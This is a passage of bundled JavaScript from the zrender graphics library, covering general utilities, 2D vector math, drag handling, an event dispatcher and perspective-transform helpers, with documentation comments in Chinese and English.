(typeof data === 'string') {\n        return false;\n    }\n    return typeof data.length === 'number';\n}\n\n/**\n * 数组或对象遍历\n * @memberOf module:zrender/core/util\n * @param {Object|Array} obj\n * @param {Function} cb\n * @param {*} [context]\n */\nfunction each$1(obj, cb, context) {\n    if (!(obj && cb)) {\n        return;\n    }\n    if (obj.forEach && obj.forEach === nativeForEach) {\n        obj.forEach(cb, context);\n    }\n    else if (obj.length === +obj.length) {\n        for (var i = 0, len = obj.length; i < len; i++) {\n            cb.call(context, obj[i], i, obj);\n        }\n    }\n    else {\n        for (var key in obj) {\n            if (obj.hasOwnProperty(key)) {\n                cb.call(context, obj[key], key, obj);\n            }\n        }\n    }\n}\n\n/**\n * 数组映射\n * @memberOf module:zrender/core/util\n * @param {Array} obj\n * @param {Function} cb\n * @param {*} [context]\n * @return {Array}\n */\nfunction map(obj, cb, context) {\n    if (!(obj && cb)) {\n        return;\n    }\n    if (obj.map && obj.map === nativeMap) {\n        return obj.map(cb, context);\n    }\n    else {\n        var result = [];\n        for (var i = 0, len = obj.length; i < len; i++) {\n            result.push(cb.call(context, obj[i], i, obj));\n        }\n        return result;\n    }\n}\n\n/**\n * @memberOf module:zrender/core/util\n * @param {Array} obj\n * @param {Function} cb\n * @param {Object} [memo]\n * @param {*} [context]\n * @return {Array}\n */\nfunction reduce(obj, cb, memo, context) {\n    if (!(obj && cb)) {\n        return;\n    }\n    if (obj.reduce && obj.reduce === nativeReduce) {\n        return obj.reduce(cb, memo, context);\n    }\n    else {\n        for (var i = 0, len = obj.length; i < len; i++) {\n            memo = cb.call(context, memo, obj[i], i, obj);\n        }\n        return memo;\n    }\n}\n\n/**\n * 数组过滤\n * @memberOf module:zrender/core/util\n * @param {Array} obj\n * @param {Function} cb\n * @param {*} [context]\n * @return {Array}\n */\nfunction filter(obj, cb, context) {\n    if (!(obj && cb)) {\n        return;\n    }\n    if (obj.filter && obj.filter === nativeFilter) {\n        return obj.filter(cb, context);\n    }\n    else {\n        var result = [];\n        for (var i = 0, len = obj.length; i < len; i++) {\n            if (cb.call(context, obj[i], i, obj)) {\n                result.push(obj[i]);\n            }\n        }\n        return result;\n    }\n}\n\n/**\n * 数组项查找\n * @memberOf module:zrender/core/util\n * @param {Array} obj\n * @param {Function} cb\n * @param {*} [context]\n * @return {*}\n */\nfunction find(obj, cb, context) {\n    if (!(obj && cb)) {\n        return;\n    }\n    for (var i = 0, len = obj.length; i < len; i++) {\n        if (cb.call(context, obj[i], i, obj)) {\n            return obj[i];\n        }\n    }\n}\n\n/**\n * @memberOf module:zrender/core/util\n * @param {Function} func\n * @param {*} context\n * @return {Function}\n */\nfunction bind(func, context) {\n    var args = nativeSlice.call(arguments, 2);\n    return function () {\n        return func.apply(context, args.concat(nativeSlice.call(arguments)));\n    };\n}\n\n/**\n * @memberOf module:zrender/core/util\n * @param {Function} func\n * @return {Function}\n */\nfunction curry(func) {\n    var args = nativeSlice.call(arguments, 1);\n    return function () {\n        return func.apply(this, args.concat(nativeSlice.call(arguments)));\n    };\n}\n\n/**\n * @memberOf module:zrender/core/util\n * @param {*} value\n * @return {boolean}\n */\nfunction isArray(value) {\n    return objToString.call(value) === '[object Array]';\n}\n\n/**\n * @memberOf module:zrender/core/util\n * @param {*} value\n * @return {boolean}\n */\nfunction isFunction$1(value) {\n    return typeof value === 'function';\n}\n\n/**\n * @memberOf module:zrender/core/util\n * @param {*} value\n * @return {boolean}\n */\nfunction isString(value) {\n    return objToString.call(value) === '[object String]';\n}\n\n/**\n * @memberOf module:zrender/core/util\n * @param {*} value\n * @return {boolean}\n */\nfunction isObject$1(value) {\n    // Avoid a V8 JIT bug in Chrome 19-20.\n    // See https://code.google.com/p/v8/issues/detail?id=2291 for more details.\n    var type = typeof value;\n    return type === 'function' || (!!value && type === 'object');\n}\n\n/**\n * @memberOf module:zrender/core/util\n * @param {*} value\n * @return {boolean}\n */\nfunction isBuiltInObject(value) {\n    return !!BUILTIN_OBJECT[objToString.call(value)];\n}\n\n/**\n * @memberOf module:zrender/core/util\n * @param {*} value\n * @return {boolean}\n */\nfunction isTypedArray(value) {\n    return !!TYPED_ARRAY[objToString.call(value)];\n}\n\n/**\n * @memberOf module:zrender/core/util\n * @param {*} value\n * @return {boolean}\n */\nfunction isDom(value) {\n    return typeof value === 'object'\n        && typeof value.nodeType === 'number'\n        && typeof value.ownerDocument === 'object';\n}\n\n/**\n * Whether is exactly NaN. Notice isNaN('a') returns true.\n * @param {*} value\n * @return {boolean}\n */\nfunction eqNaN(value) {\n    /* eslint-disable-next-line no-self-compare */\n    return value !== value;\n}\n\n/**\n * If value1 is not null, then return value1, otherwise judget rest of values.\n * Low performance.\n * @memberOf module:zrender/core/util\n * @return {*} Final value\n */\nfunction retrieve(values) {\n    for (var i = 0, len = arguments.length; i < len; i++) {\n        if (arguments[i] != null) {\n            return arguments[i];\n        }\n    }\n}\n\nfunction retrieve2(value0, value1) {\n    return value0 != null\n        ? value0\n        : value1;\n}\n\nfunction retrieve3(value0, value1, value2) {\n    return value0 != null\n        ? value0\n        : value1 != null\n        ? value1\n        : value2;\n}\n\n/**\n * @memberOf module:zrender/core/util\n * @param {Array} arr\n * @param {number} startIndex\n * @param {number} endIndex\n * @return {Array}\n */\nfunction slice() {\n    return Function.call.apply(nativeSlice, arguments);\n}\n\n/**\n * Normalize css liked array configuration\n * e.g.\n *  3 => [3, 3, 3, 3]\n *  [4, 2] => [4, 2, 4, 2]\n *  [4, 3, 2] => [4, 3, 2, 3]\n * @param {number|Array.<number>} val\n * @return {Array.<number>}\n */\nfunction normalizeCssArray(val) {\n    if (typeof (val) === 'number') {\n        return [val, val, val, val];\n    }\n    var len = val.length;\n    if (len === 2) {\n        // vertical | horizontal\n        return [val[0], val[1], val[0], val[1]];\n    }\n    else if (len === 3) {\n        // top | horizontal | bottom\n        return [val[0], val[1], val[2], val[1]];\n    }\n    return val;\n}\n\n/**\n * @memberOf module:zrender/core/util\n * @param {boolean} condition\n * @param {string} message\n */\nfunction assert$1(condition, message) {\n    if (!condition) {\n        throw new Error(message);\n    }\n}\n\n/**\n * @memberOf module:zrender/core/util\n * @param {string} str string to be trimed\n * @return {string} trimed string\n */\nfunction trim(str) {\n    if (str == null) {\n        return null;\n    }\n    else if (typeof str.trim === 'function') {\n        return str.trim();\n    }\n    else {\n        return str.replace(/^[\\s\\uFEFF\\xA0]+|[\\s\\uFEFF\\xA0]+$/g, '');\n    }\n}\n\nvar primitiveKey = '__ec_primitive__';\n/**\n * Set an object as primitive to be ignored traversing children in clone or merge\n */\nfunction setAsPrimitive(obj) {\n    obj[primitiveKey] = true;\n}\n\nfunction isPrimitive(obj) {\n    return obj[primitiveKey];\n}\n\n/**\n * @constructor\n * @param {Object} obj Only apply `ownProperty`.\n */\nfunction HashMap(obj) {\n    var isArr = isArray(obj);\n    // Key should not be set on this, otherwise\n    // methods get/set/... may be overrided.\n    this.data = {};\n    var thisMap = this;\n\n    (obj instanceof HashMap)\n        ? obj.each(visit)\n        : (obj && each$1(obj, visit));\n\n    function visit(value, key) {\n        isArr ? thisMap.set(value, key) : thisMap.set(key, value);\n    }\n}\n\nHashMap.prototype = {\n    constructor: HashMap,\n    // Do not provide `has` method to avoid defining what is `has`.\n    // (We usually treat `null` and `undefined` as the same, different\n    // from ES6 Map).\n    get: function (key) {\n        return this.data.hasOwnProperty(key) ? this.data[key] : null;\n    },\n    set: function (key, value) {\n        // Comparing with invocation chaining, `return value` is more commonly\n        // used in this case: `var someVal = map.set('a', genVal());`\n        return (this.data[key] = value);\n    },\n    // Although util.each can be performed on this hashMap directly, user\n    // should not use the exposed keys, who are prefixed.\n    each: function (cb, context) {\n        context !== void 0 && (cb = bind(cb, context));\n        /* eslint-disable guard-for-in */\n        for (var key in this.data) {\n            this.data.hasOwnProperty(key) && cb(this.data[key], key);\n        }\n        /* eslint-enable guard-for-in */\n    },\n    // Do not use this method if performance sensitive.\n    removeKey: function (key) {\n        delete this.data[key];\n    }\n};\n\nfunction createHashMap(obj) {\n    return new HashMap(obj);\n}\n\nfunction concatArray(a, b) {\n    var newArray = new a.constructor(a.length + b.length);\n    for (var i = 0; i < a.length; i++) {\n        newArray[i] = a[i];\n    }\n    var offset = a.length;\n    for (i = 0; i < b.length; i++) {\n        newArray[i + offset] = b[i];\n    }\n    return newArray;\n}\n\n\nfunction noop() {}\n\n\nvar zrUtil = (Object.freeze || Object)({\n\t$override: $override,\n\tclone: clone,\n\tmerge: merge,\n\tmergeAll: mergeAll,\n\textend: extend,\n\tdefaults: defaults,\n\tcreateCanvas: createCanvas,\n\tgetContext: getContext,\n\tindexOf: indexOf,\n\tinherits: inherits,\n\tmixin: mixin,\n\tisArrayLike: isArrayLike,\n\teach: each$1,\n\tmap: map,\n\treduce: reduce,\n\tfilter: filter,\n\tfind: find,\n\tbind: bind,\n\tcurry: curry,\n\tisArray: isArray,\n\tisFunction: isFunction$1,\n\tisString: isString,\n\tisObject: isObject$1,\n\tisBuiltInObject: isBuiltInObject,\n\tisTypedArray: isTypedArray,\n\tisDom: isDom,\n\teqNaN: eqNaN,\n\tretrieve: retrieve,\n\tretrieve2: retrieve2,\n\tretrieve3: retrieve3,\n\tslice: slice,\n\tnormalizeCssArray: normalizeCssArray,\n\tassert: assert$1,\n\ttrim: trim,\n\tsetAsPrimitive: setAsPrimitive,\n\tisPrimitive: isPrimitive,\n\tcreateHashMap: createHashMap,\n\tconcatArray: concatArray,\n\tnoop: noop\n});\n\n/* global Float32Array */\n\nvar ArrayCtor = typeof Float32Array === 'undefined'\n    ? Array\n    : Float32Array;\n\n/**\n * 创建一个向量\n * @param {number} [x=0]\n * @param {number} [y=0]\n * @return {Vector2}\n */\nfunction create(x, y) {\n    var out = new ArrayCtor(2);\n    if (x == null) {\n        x = 0;\n    }\n    if (y == null) {\n        y = 0;\n    }\n    out[0] = x;\n    out[1] = y;\n    return out;\n}\n\n/**\n * 复制向量数据\n * @param {Vector2} out\n * @param {Vector2} v\n * @return {Vector2}\n */\nfunction copy(out, v) {\n    out[0] = v[0];\n    out[1] = v[1];\n    return out;\n}\n\n/**\n * 克隆一个向量\n * @param {Vector2} v\n * @return {Vector2}\n */\nfunction clone$1(v) {\n    var out = new ArrayCtor(2);\n    out[0] = v[0];\n    out[1] = v[1];\n    return out;\n}\n\n/**\n * 设置向量的两个项\n * @param {Vector2} out\n * @param {number} a\n * @param {number} b\n * @return {Vector2} 结果\n */\nfunction set(out, a, b) {\n    out[0] = a;\n    out[1] = b;\n    return out;\n}\n\n/**\n * 向量相加\n * @param {Vector2} out\n * @param {Vector2} v1\n * @param {Vector2} v2\n */\nfunction add(out, v1, v2) {\n    out[0] = v1[0] + v2[0];\n    out[1] = v1[1] + v2[1];\n    return out;\n}\n\n/**\n * 向量缩放后相加\n * @param {Vector2} out\n * @param {Vector2} v1\n * @param {Vector2} v2\n * @param {number} a\n */\nfunction scaleAndAdd(out, v1, v2, a) {\n    out[0] = v1[0] + v2[0] * a;\n    out[1] = v1[1] + v2[1] * a;\n    return out;\n}\n\n/**\n * 向量相减\n * @param {Vector2} out\n * @param {Vector2} v1\n * @param {Vector2} v2\n */\nfunction sub(out, v1, v2) {\n    out[0] = v1[0] - v2[0];\n    out[1] = v1[1] - v2[1];\n    return out;\n}\n\n/**\n * 向量长度\n * @param {Vector2} v\n * @return {number}\n */\nfunction len(v) {\n    return Math.sqrt(lenSquare(v));\n}\nvar length = len; // jshint ignore:line\n\n/**\n * 向量长度平方\n * @param {Vector2} v\n * @return {number}\n */\nfunction lenSquare(v) {\n    return v[0] * v[0] + v[1] * v[1];\n}\nvar lengthSquare = lenSquare;\n\n/**\n * 向量乘法\n * @param {Vector2} out\n * @param {Vector2} v1\n * @param {Vector2} v2\n */\nfunction mul(out, v1, v2) {\n    out[0] = v1[0] * v2[0];\n    out[1] = v1[1] * v2[1];\n    return out;\n}\n\n/**\n * 向量除法\n * @param {Vector2} out\n * @param {Vector2} v1\n * @param {Vector2} v2\n */\nfunction div(out, v1, v2) {\n    out[0] = v1[0] / v2[0];\n    out[1] = v1[1] / v2[1];\n    return out;\n}\n\n/**\n * 向量点乘\n * @param {Vector2} v1\n * @param {Vector2} v2\n * @return {number}\n */\nfunction dot(v1, v2) {\n    return v1[0] * v2[0] + v1[1] * v2[1];\n}\n\n/**\n * 向量缩放\n * @param {Vector2} out\n * @param {Vector2} v\n * @param {number} s\n */\nfunction scale(out, v, s) {\n    out[0] = v[0] * s;\n    out[1] = v[1] * s;\n    return out;\n}\n\n/**\n * 向量归一化\n * @param {Vector2} out\n * @param {Vector2} v\n */\nfunction normalize(out, v) {\n    var d = len(v);\n    if (d === 0) {\n        out[0] = 0;\n        out[1] = 0;\n    }\n    else {\n        out[0] = v[0] / d;\n        out[1] = v[1] / d;\n    }\n    return out;\n}\n\n/**\n * 计算向量间距离\n * @param {Vector2} v1\n * @param {Vector2} v2\n * @return {number}\n */\nfunction distance(v1, v2) {\n    return Math.sqrt(\n        (v1[0] - v2[0]) * (v1[0] - v2[0])\n        + (v1[1] - v2[1]) * (v1[1] - v2[1])\n    );\n}\nvar dist = distance;\n\n/**\n * 向量距离平方\n * @param {Vector2} v1\n * @param {Vector2} v2\n * @return {number}\n */\nfunction distanceSquare(v1, v2) {\n    return (v1[0] - v2[0]) * (v1[0] - v2[0])\n        + (v1[1] - v2[1]) * (v1[1] - v2[1]);\n}\nvar distSquare = distanceSquare;\n\n/**\n * 求负向量\n * @param {Vector2} out\n * @param {Vector2} v\n */\nfunction negate(out, v) {\n    out[0] = -v[0];\n    out[1] = -v[1];\n    return out;\n}\n\n/**\n * 插值两个点\n * @param {Vector2} out\n * @param {Vector2} v1\n * @param {Vector2} v2\n * @param {number} t\n */\nfunction lerp(out, v1, v2, t) {\n    out[0] = v1[0] + t * (v2[0] - v1[0]);\n    out[1] = v1[1] + t * (v2[1] - v1[1]);\n    return out;\n}\n\n/**\n * 矩阵左乘向量\n * @param {Vector2} out\n * @param {Vector2} v\n * @param {Vector2} m\n */\nfunction applyTransform(out, v, m) {\n    var x = v[0];\n    var y = v[1];\n    out[0] = m[0] * x + m[2] * y + m[4];\n    out[1] = m[1] * x + m[3] * y + m[5];\n    return out;\n}\n\n/**\n * 求两个向量最小值\n * @param  {Vector2} out\n * @param  {Vector2} v1\n * @param  {Vector2} v2\n */\nfunction min(out, v1, v2) {\n    out[0] = Math.min(v1[0], v2[0]);\n    out[1] = Math.min(v1[1], v2[1]);\n    return out;\n}\n\n/**\n * 求两个向量最大值\n * @param  {Vector2} out\n * @param  {Vector2} v1\n * @param  {Vector2} v2\n */\nfunction max(out, v1, v2) {\n    out[0] = Math.max(v1[0], v2[0]);\n    out[1] = Math.max(v1[1], v2[1]);\n    return out;\n}\n\n\nvar vector = (Object.freeze || Object)({\n\tcreate: create,\n\tcopy: copy,\n\tclone: clone$1,\n\tset: set,\n\tadd: add,\n\tscaleAndAdd: scaleAndAdd,\n\tsub: sub,\n\tlen: len,\n\tlength: length,\n\tlenSquare: lenSquare,\n\tlengthSquare: lengthSquare,\n\tmul: mul,\n\tdiv: div,\n\tdot: dot,\n\tscale: scale,\n\tnormalize: normalize,\n\tdistance: distance,\n\tdist: dist,\n\tdistanceSquare: distanceSquare,\n\tdistSquare: distSquare,\n\tnegate: negate,\n\tlerp: lerp,\n\tapplyTransform: applyTransform,\n\tmin: min,\n\tmax: max\n});\n\n// TODO Draggable for group\n// FIXME Draggable on element which has parent rotation or scale\nfunction Draggable() {\n\n    this.on('mousedown', this._dragStart, this);\n    this.on('mousemove', this._drag, this);\n    this.on('mouseup', this._dragEnd, this);\n    // `mosuemove` and `mouseup` can be continue to fire when dragging.\n    // See [Drag outside] in `Handler.js`. So we do not need to trigger\n    // `_dragEnd` when globalout. That would brings better user experience.\n    // this.on('globalout', this._dragEnd, this);\n\n    // this._dropTarget = null;\n    // this._draggingTarget = null;\n\n    // this._x = 0;\n    // this._y = 0;\n}\n\nDraggable.prototype = {\n\n    constructor: Draggable,\n\n    _dragStart: function (e) {\n        var draggingTarget = e.target;\n        // Find if there is draggable in the ancestor\n        while (draggingTarget && !draggingTarget.draggable) {\n            draggingTarget = draggingTarget.parent;\n        }\n        if (draggingTarget) {\n            this._draggingTarget = draggingTarget;\n            draggingTarget.dragging = true;\n            this._x = e.offsetX;\n            this._y = e.offsetY;\n\n            this.dispatchToElement(param(draggingTarget, e), 'dragstart', e.event);\n        }\n    },\n\n    _drag: function (e) {\n        var draggingTarget = this._draggingTarget;\n        if (draggingTarget) {\n\n            var x = e.offsetX;\n            var y = e.offsetY;\n\n            var dx = x - this._x;\n            var dy = y - this._y;\n            this._x = x;\n            this._y = y;\n\n            draggingTarget.drift(dx, dy, e);\n            this.dispatchToElement(param(draggingTarget, e), 'drag', e.event);\n\n            var dropTarget = this.findHover(x, y, draggingTarget).target;\n            var lastDropTarget = this._dropTarget;\n            this._dropTarget = dropTarget;\n\n            if (draggingTarget !== dropTarget) {\n                if (lastDropTarget && dropTarget !== lastDropTarget) {\n                    this.dispatchToElement(param(lastDropTarget, e), 'dragleave', e.event);\n                }\n                if (dropTarget && dropTarget !== lastDropTarget) {\n                    this.dispatchToElement(param(dropTarget, e), 'dragenter', e.event);\n                }\n            }\n        }\n    },\n\n    _dragEnd: function (e) {\n        var draggingTarget = this._draggingTarget;\n\n        if (draggingTarget) {\n            draggingTarget.dragging = false;\n        }\n\n        this.dispatchToElement(param(draggingTarget, e), 'dragend', e.event);\n\n        if (this._dropTarget) {\n            this.dispatchToElement(param(this._dropTarget, e), 'drop', e.event);\n        }\n\n        this._draggingTarget = null;\n        this._dropTarget = null;\n    }\n\n};\n\nfunction param(target, e) {\n    return {target: target, topTarget: e && e.topTarget};\n}\n\n/**\n * Event Mixin\n * @module zrender/mixin/Eventful\n * @author Kener (@Kener-林峰, kener.linfeng@gmail.com)\n *         pissang (https://www.github.com/pissang)\n */\n\nvar arrySlice = Array.prototype.slice;\n\n/**\n * Event dispatcher.\n *\n * @alias module:zrender/mixin/Eventful\n * @constructor\n * @param {Object} [eventProcessor] The object eventProcessor is the scope when\n *        `eventProcessor.xxx` called.\n * @param {Function} [eventProcessor.normalizeQuery]\n *        param: {string|Object} Raw query.\n *        return: {string|Object} Normalized query.\n * @param {Function} [eventProcessor.filter] Event will be dispatched only\n *        if it returns `true`.\n *        param: {string} eventType\n *        param: {string|Object} query\n *        return: {boolean}\n * @param {Function} [eventProcessor.afterTrigger] Called after all handlers called.\n *        param: {string} eventType\n */\nvar Eventful = function (eventProcessor) {\n    this._$handlers = {};\n    this._$eventProcessor = eventProcessor;\n};\n\nEventful.prototype = {\n\n    constructor: Eventful,\n\n    /**\n     * The handler can only be triggered once, then removed.\n     *\n     * @param {string} event The event name.\n     * @param {string|Object} [query] Condition used on event filter.\n     * @param {Function} handler The event handler.\n     * @param {Object} context\n     */\n    one: function (event, query, handler, context) {\n        return on(this, event, query, handler, context, true);\n    },\n\n    /**\n     * Bind a handler.\n     *\n     * @param {string} event The event name.\n     * @param {string|Object} [query] Condition used on event filter.\n     * @param {Function} handler The event handler.\n     * @param {Object} [context]\n     */\n    on: function (event, query, handler, context) {\n        return on(this, event, query, handler, context, false);\n    },\n\n    /**\n     * Whether any handler has bound.\n     *\n     * @param  {string}  event\n     * @return {boolean}\n     */\n    isSilent: function (event) {\n        var _h = this._$handlers;\n        return !_h[event] || !_h[event].length;\n    },\n\n    /**\n     * Unbind a event.\n     *\n     * @param {string} [event] The event name.\n     *        If no `event` input, \"off\" all listeners.\n     * @param {Function} [handler] The event handler.\n     *        If no `handler` input, \"off\" all listeners of the `event`.\n     */\n    off: function (event, handler) {\n        var _h = this._$handlers;\n\n        if (!event) {\n            this._$handlers = {};\n            return this;\n        }\n\n        if (handler) {\n            if (_h[event]) {\n                var newList = [];\n                for (var i = 0, l = _h[event].length; i < l; i++) {\n                    if (_h[event][i].h !== handler) {\n                        newList.push(_h[event][i]);\n                    }\n                }\n                _h[event] = newList;\n            }\n\n            if (_h[event] && _h[event].length === 0) {\n                delete _h[event];\n            }\n        }\n        else {\n            delete _h[event];\n        }\n\n        return this;\n    },\n\n    /**\n     * Dispatch a event.\n     *\n     * @param {string} type The event name.\n     */\n    trigger: function (type) {\n        var _h = this._$handlers[type];\n        var eventProcessor = this._$eventProcessor;\n\n        if (_h) {\n            var args = arguments;\n            var argLen = args.length;\n\n            if (argLen > 3) {\n                args = arrySlice.call(args, 1);\n            }\n\n            var len = _h.length;\n            for (var i = 0; i < len;) {\n                var hItem = _h[i];\n                if (eventProcessor\n                    && eventProcessor.filter\n                    && hItem.query != null\n                    && !eventProcessor.filter(type, hItem.query)\n                ) {\n                    i++;\n                    continue;\n                }\n\n                // Optimize advise from backbone\n                switch (argLen) {\n                    case 1:\n                        hItem.h.call(hItem.ctx);\n                        break;\n                    case 2:\n                        hItem.h.call(hItem.ctx, args[1]);\n                        break;\n                    case 3:\n                        hItem.h.call(hItem.ctx, args[1], args[2]);\n                        break;\n                    default:\n                        // have more than 2 given arguments\n                        hItem.h.apply(hItem.ctx, args);\n                        break;\n                }\n\n                if (hItem.one) {\n                    _h.splice(i, 1);\n                    len--;\n                }\n                else {\n                    i++;\n                }\n            }\n        }\n\n        eventProcessor && eventProcessor.afterTrigger\n            && eventProcessor.afterTrigger(type);\n\n        return this;\n    },\n\n    /**\n     * Dispatch a event with context, which is specified at the last parameter.\n     *\n     * @param {string} type The event name.\n     */\n    triggerWithContext: function (type) {\n        var _h = this._$handlers[type];\n        var eventProcessor = this._$eventProcessor;\n\n        if (_h) {\n            var args = arguments;\n            var argLen = args.length;\n\n            if (argLen > 4) {\n                args = arrySlice.call(args, 1, args.length - 1);\n            }\n            var ctx = args[args.length - 1];\n\n            var len = _h.length;\n            for (var i = 0; i < len;) {\n                var hItem = _h[i];\n                if (eventProcessor\n                    && eventProcessor.filter\n                    && hItem.query != null\n                    && !eventProcessor.filter(type, hItem.query)\n                ) {\n                    i++;\n                    continue;\n                }\n\n                // Optimize advise from backbone\n                switch (argLen) {\n                    case 1:\n                        hItem.h.call(ctx);\n                        break;\n                    case 2:\n                        hItem.h.call(ctx, args[1]);\n                        break;\n                    case 3:\n                        hItem.h.call(ctx, args[1], args[2]);\n                        break;\n                    default:\n                        // have more than 2 given arguments\n                        hItem.h.apply(ctx, args);\n                        break;\n                }\n\n                if (hItem.one) {\n                    _h.splice(i, 1);\n                    len--;\n                }\n                else {\n                    i++;\n                }\n            }\n        }\n\n        eventProcessor && eventProcessor.afterTrigger\n            && eventProcessor.afterTrigger(type);\n\n        return this;\n    }\n};\n\n\nfunction normalizeQuery(host, query) {\n    var eventProcessor = host._$eventProcessor;\n    if (query != null && eventProcessor && eventProcessor.normalizeQuery) {\n        query = eventProcessor.normalizeQuery(query);\n    }\n    return query;\n}\n\nfunction on(eventful, event, query, handler, context, isOnce) {\n    var _h = eventful._$handlers;\n\n    if (typeof query === 'function') {\n        context = handler;\n        handler = query;\n        query = null;\n    }\n\n    if (!handler || !event) {\n        return eventful;\n    }\n\n    query = normalizeQuery(eventful, query);\n\n    if (!_h[event]) {\n        _h[event] = [];\n    }\n\n    for (var i = 0; i < _h[event].length; i++) {\n        if (_h[event][i].h === handler) {\n            return eventful;\n        }\n    }\n\n    var wrap = {\n        h: handler,\n        one: isOnce,\n        query: query,\n        ctx: context || eventful,\n        // FIXME\n        // Do not publish this feature util it is proved that it makes sense.\n        callAtLast: handler.zrEventfulCallAtLast\n    };\n\n    var lastIndex = _h[event].length - 1;\n    var lastWrap = _h[event][lastIndex];\n    (lastWrap && lastWrap.callAtLast)\n        ? _h[event].splice(lastIndex, 0, wrap)\n        : _h[event].push(wrap);\n\n    return eventful;\n}\n\n/**\n * The algoritm is learnt from\n * https://franklinta.com/2014/09/08/computing-css-matrix3d-transforms/\n * And we made some optimization for matrix inversion.\n * Other similar approaches:\n * \"cv::getPerspectiveTransform\", \"Direct Linear Transformation\".\n */\n\nvar LN2 = Math.log(2);\n\nfunction determinant(rows, rank, rowStart, rowMask, colMask, detCache) {\n    var cacheKey = rowMask + '-' + colMask;\n    var fullRank = rows.length;\n\n    if (detCache.hasOwnProperty(cacheKey)) {\n        return detCache[cacheKey];\n    }\n\n    if (rank === 1) {\n        // In this case the colMask must be like: `11101111`. We can find the place of `0`.\n        var colStart = Math.round(Math.log(((1 << fullRank) - 1) & ~colMask) / LN2);\n        return rows[rowStart][colStart];\n    }\n\n    var subRowMask = rowMask | (1 << rowStart);\n    var subRowStart = rowStart + 1;\n    while (rowMask & (1 << subRowStart)) {\n        subRowStart++;\n    }\n\n    var sum = 0;\n    for (var j = 0, colLocalIdx = 0; j < fullRank; j++) {\n        var colTag = 1 << j;\n        if (!(colTag & colMask)) {\n            sum += (colLocalIdx % 2 ? -1 : 1) * rows[rowStart][j]\n                // det(subMatrix(0, j))\n                * determinant(rows, rank - 1, subRowStart, subRowMask, colMask | colTag, detCache);\n            colLocalIdx++;\n        }\n    }\n\n    detCache[cacheKey] = sum;\n\n    return sum;\n}\n\n/**\n * Usage:\n * ```js\n * var transformer = buildTransformer(\n *     [10, 44, 100, 44, 100, 300, 10, 300],\n *     [50, 54, 130, 14, 140, 330, 14, 220]\n * );\n * var out = [];\n * transformer && transformer([11, 33], out);\n * ```\n *\n * Notice: `buildTransformer` may take more than 10ms in some Android device.\n *\n * @param {Array.<number>} src source four points, [x0, y0, x1, y1, x2, y2, x3, y3]\n * @param {Array.<number>} dest destination four points, [x0, y0, x1, y1, x2, y2, x3, y3]\n * @return {Function} transformer If fail, return null/undefined.\n */\nfunction buildTransformer(src, dest) {\n    var mA = [\n        [src[0], src[1], 1, 0, 0, 0, -dest[0] * src[0], -dest[0] * src[1]],\n        [0, 0, 0, src[0], src[1], 1, -dest[1] * src[0], -dest[1] * src[1]],\n        [src[2], src[3], 1, 0, 0, 0, -dest[2] * src[2], -dest[2] * src[3]],\n        [0, 0, 0, src[2], src[3], 1, -dest[3] * src[2], -dest[3] * src[3]],\n        [src[4], src[5], 1, 0, 0, 0, -dest[4] * src[4], -dest[4] * src[5]],\n        [0, 0, 0, src[4], src[5], 1, -dest[5] * src[4], -dest[5] * src[5]],\n        [src[6], src[7], 1, 0, 0, 0, -dest[6] * src[6], -dest[6] * src[7]],\n        [0, 0, 0, src[6], src[7], 1, -dest[7] * src[6], -dest[7] * src[7]]\n    ];\n\n    var detCache = {};\n    var det = determinant(mA, 8, 0, 0, 0, detCache);\n    if (det === 0) {\n        // can not make transformer when and only when\n        // any three of the markers are collinear.\n        return;\n    }\n\n    // `invert(mA) * dest`, that is, `adj(mA) / det * dest`.\n    var vh = [];\n    for (var i = 0; i < 8; i++) {\n        for (var j = 0; j < 8; j++) {\n            vh[j] == null && (vh[j] = 0);\n            vh[j] += ((i + j) % 2 ? -1 : 1)\n                // det(subMatrix(i, j))\n                * determinant(mA, 7, i === 0 ? 1 : 0, 1 << i, 1 << j, detCache)\n                / det * dest[i];\n        }\n    }\n\n    return function (out, srcPointX, srcPointY) {\n        var pk = srcPointX * vh[6] + srcPointY * vh[7] + 1;\n        out[0] = (srcPointX * vh[0] + srcPointY * vh[1] + vh[2]) / pk;\n        out[1] = (srcPointX * vh[3] + srcPointY * vh[4] + vh[5]) / pk;\n    };\n}\n\nvar EVENT_SAVED_PROP = '___zrEVENTSAVED';\nvar _calcOut$1 = [];\n\n/**\n * Transform \"local coord\" from `elFrom` to `elTarget`.\n * \"local coord\": the coord based on the input `el`. The origin point is at\n *     the position of \"left: 0; top: 0;\" in the `el`.\n *\n * Support when CSS transform is used.\n *\n * Having the `out` (that is, `[outX, outY]`), we can create an DOM element\n * and set the CSS style as \"left: outX; top: outY;\" and append it to `elTarge`\n * to locate the element.\n *\n * For example, this code below positions a child of `document.body` on the event\n * point, no matter whether `body` has `margin`/`paddin`/`transfrom`/... :\n * ```js\n * transformLocalCoord(out, container, document.body, event.offsetX, event.offsetY);\n * if (!eqNaN(out[0])) {\n *     // Then locate the tip element on the event point.\n *     var tipEl = document.createElement('div');\n *     tipEl.style.cssText = 'position: absolute; left:' + out[0] + ';top:' + out[1] + ';';\n *     document.body.appendChild(tipEl);\n * }\n * ```\n *\n * Notice: In some env this method is not supported. If called, `out` will be `[NaN, NaN]`.\n *\n * @param {Array.<number>} out [inX: number, inY: number] The output..\n *        If can not transform, `out` will not be modified but return `false`.\n * @param {HTMLElement} elFrom The `[inX, inY]` is based on elFrom.\n * @param {HTMLElement} elTarget The `out` is based on elTarget.\n * @param {number} inX\n * @param {number} inY\n * @return {boolean} Whether transform successfully.\n */\nfunction transformLocalCoord(out, elFrom, elTarget, inX, inY) {\n    return transformCoordWithViewport(_calcOut$1, elFrom, inX, inY, true)\n        && transformCoordWithViewport(out, elTarget, _calcOut$1[0], _calcOut$1[1]);\n}\n\n/**\n * Transform between a \"viewport coord\" and a \"local coord\".\n * \"viewport coord\": the coord based on the left-top corner of the viewport\n *     of the browser.\n * \"local coord\": the coord based on the input `el`. The origin point is at\n *     the position of \"left: 0; top: 0;\" in the `el`.\n *\n * Support the case when CSS transform is used on el.\n *\n * @param {Array.<number>} out [inX: number, inY: number] The output. If `inverse: false`,\n *        it represents \"local coord\", otherwise \"vireport coord\".\n *        If can not transform, `out` will not be modified but return `false`.\n * @param {HTMLElement} el The \"local coord\" is based on the `el`, see comment above.\n * @param {number} inX If `inverse: false`,\n *        it represents \"vireport coord\", otherwise \"local coord\".\n * @param {number} inY If `inverse: false`,\n *        it represents \"vireport coord\", otherwise \"local coord\".\n * @param {boolean} [inverse=false]\n *        `true`: from \"viewport coord\" to \"local coord\".\n *        `false`: from \"local coord\" to \"viewport coord\".\n * @return {boolean} Whether transform successfully.\n */\nfunction 